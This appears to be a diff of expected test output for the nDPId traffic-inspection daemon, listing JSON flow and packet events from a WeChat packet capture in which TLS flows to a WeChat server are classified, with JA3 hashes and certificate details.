-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54109,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA044hAAEAGMbzAqAFny82XotNdAbtNZ116WRhNMIARAViFkQAAAQEICgAxu\/1F0qIP"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617247,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1492167617247,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617247,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0trJAAEAGXpLAqAFny82XotNeAbstqSV4qlMZrIARASwk9gAAAQEICgAxu\/1Frj0D"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617248,"flow_last_seen":1492167617248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617248,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1492167617248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617248,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8JpFAAEAG7qvAqAFny82XotNfAbt51Z1vAAAAAKACchAH4QAAAgQFtAQCCAoAMbv+AAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167617498,"flow_last_seen":1492167617498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167617498,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617560,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701\/B3aGGedWdcKASN8hYRQAAAgQFoAQCCApFrkDUADG7\/gEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":845,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1492167617560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617560,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JpJAAEAG7rLAqAFny82XotNfAbt51Z1wwd2hh4AQAOW9kgAAAQEICgAxvExFrkDU"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":846,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167617248,"flow_last_seen":1492167617561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167617561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":847,"source":"wechat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1492167617562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0KCxAACwGAHnLzZeiwKgBZwG7016qUxmsLakleYAQAJ8hsQAAAQEICkWuQNUAMbv9"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"wechat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1492167617598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617598,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0701AAC0GOFfLzZeiwKgBZwG7011ZGE0wTWdde4AQAOqB1AAAAQEICkXSpjoAMbv9"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":849,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167617850,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702Andsj9g29laaASN8iTkQAAAgQFoAQCCApF0qaCADG8PAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1492167617850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167617850,"pkt":"8IQvSpdgeJKcD6iOCABFAAA02VVAAEAGO+\/AqAFny82XotNgAbuDb2VpJ3bI\/oAQAOX41AAAAQEICgAxvJRF0qaC"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":852,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167617248,"flow_last_seen":1492167617881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167617881,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":854,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167617248,"flow_last_seen":1492167617883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167617883,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167619048,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167619048,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1492167619048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167619048,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Dr9AAEAGBobAqAFny82XotNaAbub+DW+SvgsEIARAOUtjAAAAQEICgAxvcBFrgFX"} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1492167353687,"flow_last_seen":1492167367265,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5826,"flow_tot_l4_payload_len":23865,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167353937,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1492167355723,"flow_last_seen":1492167367264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167366908,"flow_last_seen":1492167378674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9774,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167367159,"flow_last_seen":1492167379000,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":878,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1492167622434,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} 
